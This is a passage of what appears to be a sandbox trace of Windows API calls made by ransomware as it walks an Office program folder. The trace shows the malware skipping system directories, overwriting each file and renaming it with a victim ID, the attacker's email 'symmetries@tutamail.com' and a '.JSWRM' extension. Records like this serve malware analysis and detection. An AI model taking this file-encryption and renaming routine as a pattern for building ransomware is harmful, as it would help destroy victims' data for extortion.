(lpString1="NativeHostAnnotationApp.xap", lpString2="msocache") returned 1 [0137.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0137.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NativeHostAnnotationApp.xap", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0137.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0137.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NativeHostAnnotationApp.xap", cchWideChar=27, lpMultiByteStr=0x240f20, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NativeHostAnnotationApp.xap", lpUsedDefaultChar=0x0) returned 27 [0137.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0137.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0137.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NativeHostAnnotationApp.xap", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0137.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0137.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NativeHostAnnotationApp.xap", cchWideChar=27, lpMultiByteStr=0x2412e0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NativeHostAnnotationApp.xap", lpUsedDefaultChar=0x0) returned 27 [0137.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0137.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0137.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0137.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0137.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\NativeHostAnnotationApp.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\nativehostannotationapp.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0137.526] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=287503) returned 1 [0137.526] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0137.527] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0137.541] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.541] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0137.541] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0137.541] CloseHandle (hObject=0x45c) returned 1 [0137.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0137.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0137.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0137.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0137.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0137.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0137.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0137.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0137.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0137.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0137.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0137.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0137.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0137.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0137.542] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\NativeHostAnnotationApp.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\nativehostannotationapp.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\NativeHostAnnotationApp.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\nativehostannotationapp.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0137.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0137.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0137.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0137.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0137.544] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddd0ee4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddd0ee4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c648aa6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a6a9, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="NativeHostPollApp.xap", cAlternateFileName="NATIVE~2.XAP")) returned 1 [0137.544] lstrcmpiW (lpString1="NativeHostPollApp.xap", lpString2=".") returned 1 [0137.544] lstrcmpiW (lpString1="NativeHostPollApp.xap", lpString2="..") returned 1 [0137.544] lstrcmpiW (lpString1="NativeHostPollApp.xap", lpString2="...") returned 1 [0137.544] lstrcmpiW (lpString1="NativeHostPollApp.xap", lpString2="windows") returned -1 [0137.544] lstrcmpiW (lpString1="NativeHostPollApp.xap", lpString2="recovery") returned -1 [0137.544] lstrcmpiW (lpString1="NativeHostPollApp.xap", lpString2="perflogs") returned -1 [0137.544] lstrcmpiW (lpString1="NativeHostPollApp.xap", lpString2="documents and settings") returned 1 [0137.544] lstrcmpiW (lpString1="NativeHostPollApp.xap", lpString2="$RECYCLE.BIN") returned 1 [0137.544] lstrcmpiW (lpString1="NativeHostPollApp.xap", lpString2="system volume information") returned -1 [0137.544] lstrcmpiW (lpString1="NativeHostPollApp.xap", lpString2="msocache") returned 1 [0137.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0137.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NativeHostPollApp.xap", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0137.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0137.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NativeHostPollApp.xap", cchWideChar=21, lpMultiByteStr=0x2412e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NativeHostPollApp.xap", lpUsedDefaultChar=0x0) returned 21 [0137.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0137.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0137.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NativeHostPollApp.xap", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0137.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0137.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NativeHostPollApp.xap", cchWideChar=21, lpMultiByteStr=0x241380, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NativeHostPollApp.xap", lpUsedDefaultChar=0x0) returned 21 [0137.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0137.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0137.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0137.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0137.545] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\NativeHostPollApp.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\nativehostpollapp.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0137.546] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=108201) returned 1 [0137.546] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a6a0) returned 0x2501e8 [0137.546] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1a6a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x1a6a0, lpOverlapped=0x0) returned 1 [0137.554] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.554] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1a6a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x1a6a0, lpOverlapped=0x0) returned 1 [0137.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0137.555] CloseHandle (hObject=0x45c) returned 1 [0137.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0137.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0137.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0137.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0137.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0137.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0137.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0137.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0137.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0137.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0137.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0137.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0137.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0137.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0137.555] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\NativeHostPollApp.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\nativehostpollapp.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\NativeHostPollApp.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\nativehostpollapp.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0137.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0137.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0137.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0137.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0137.557] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddd0ee4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddd0ee4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c98fe3e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x794a98, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="NL7Data0011.DLL", cAlternateFileName="NL7DAT~1.DLL")) returned 1 [0137.557] lstrcmpiW (lpString1="NL7Data0011.DLL", lpString2=".") returned 1 [0137.557] lstrcmpiW (lpString1="NL7Data0011.DLL", lpString2="..") returned 1 [0137.557] lstrcmpiW (lpString1="NL7Data0011.DLL", lpString2="...") returned 1 [0137.557] lstrcmpiW (lpString1="NL7Data0011.DLL", lpString2="windows") returned -1 [0137.557] lstrcmpiW (lpString1="NL7Data0011.DLL", lpString2="recovery") returned -1 [0137.557] lstrcmpiW (lpString1="NL7Data0011.DLL", lpString2="perflogs") returned -1 [0137.557] lstrcmpiW (lpString1="NL7Data0011.DLL", lpString2="documents and settings") returned 1 [0137.557] lstrcmpiW (lpString1="NL7Data0011.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.557] lstrcmpiW (lpString1="NL7Data0011.DLL", lpString2="system volume information") returned -1 [0137.557] lstrcmpiW (lpString1="NL7Data0011.DLL", lpString2="msocache") returned 1 [0137.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0137.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL7Data0011.DLL", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL7Data0011.DLL", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NL7Data0011.DLL", lpUsedDefaultChar=0x0) returned 15 [0137.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0137.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0137.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL7Data0011.DLL", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL7Data0011.DLL", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NL7Data0011.DLL", lpUsedDefaultChar=0x0) returned 15 [0137.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0137.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0137.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0137.557] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddd0ee4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddd0ee4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c72d887, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2602f8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="NL7Lexicons0011.DLL", cAlternateFileName="NL7LEX~1.DLL")) returned 1 [0137.557] lstrcmpiW (lpString1="NL7Lexicons0011.DLL", lpString2=".") returned 1 [0137.557] lstrcmpiW (lpString1="NL7Lexicons0011.DLL", lpString2="..") returned 1 [0137.557] lstrcmpiW (lpString1="NL7Lexicons0011.DLL", lpString2="...") returned 1 [0137.557] lstrcmpiW (lpString1="NL7Lexicons0011.DLL", lpString2="windows") returned -1 [0137.557] lstrcmpiW (lpString1="NL7Lexicons0011.DLL", lpString2="recovery") returned -1 [0137.557] lstrcmpiW (lpString1="NL7Lexicons0011.DLL", lpString2="perflogs") returned -1 [0137.557] lstrcmpiW (lpString1="NL7Lexicons0011.DLL", lpString2="documents and settings") returned 1 [0137.558] lstrcmpiW (lpString1="NL7Lexicons0011.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.558] lstrcmpiW (lpString1="NL7Lexicons0011.DLL", lpString2="system volume information") returned -1 [0137.558] lstrcmpiW (lpString1="NL7Lexicons0011.DLL", lpString2="msocache") returned 1 [0137.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0137.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL7Lexicons0011.DLL", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0137.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0137.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL7Lexicons0011.DLL", cchWideChar=19, lpMultiByteStr=0x2411c8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NL7Lexicons0011.DLL", lpUsedDefaultChar=0x0) returned 19 [0137.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0137.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0137.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL7Lexicons0011.DLL", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0137.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0137.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL7Lexicons0011.DLL", cchWideChar=19, lpMultiByteStr=0x241060, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NL7Lexicons0011.DLL", lpUsedDefaultChar=0x0) returned 19 [0137.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0137.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0137.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0137.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0137.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0137.558] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc5196662, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc5196662, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd8c7380a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x55bef8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="NL7MODELS0009.dll", cAlternateFileName="NL7MOD~1.DLL")) returned 1 [0137.558] lstrcmpiW (lpString1="NL7MODELS0009.dll", lpString2=".") returned 1 [0137.558] lstrcmpiW (lpString1="NL7MODELS0009.dll", lpString2="..") returned 1 [0137.558] lstrcmpiW (lpString1="NL7MODELS0009.dll", lpString2="...") returned 1 [0137.558] lstrcmpiW (lpString1="NL7MODELS0009.dll", lpString2="windows") returned -1 [0137.558] lstrcmpiW (lpString1="NL7MODELS0009.dll", lpString2="recovery") returned -1 [0137.558] lstrcmpiW (lpString1="NL7MODELS0009.dll", lpString2="perflogs") returned -1 [0137.558] lstrcmpiW (lpString1="NL7MODELS0009.dll", lpString2="documents and settings") returned 1 [0137.558] lstrcmpiW (lpString1="NL7MODELS0009.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.558] lstrcmpiW (lpString1="NL7MODELS0009.dll", lpString2="system volume information") returned -1 [0137.558] lstrcmpiW (lpString1="NL7MODELS0009.dll", lpString2="msocache") returned 1 [0137.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0137.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL7MODELS0009.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0137.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0137.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL7MODELS0009.dll", cchWideChar=17, lpMultiByteStr=0x2411f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NL7MODELS0009.dll", lpUsedDefaultChar=0x0) returned 17 [0137.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0137.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0137.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL7MODELS0009.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0137.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0137.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL7MODELS0009.dll", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NL7MODELS0009.dll", lpUsedDefaultChar=0x0) returned 17 [0137.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0137.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0137.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0137.559] HeapFree (in: 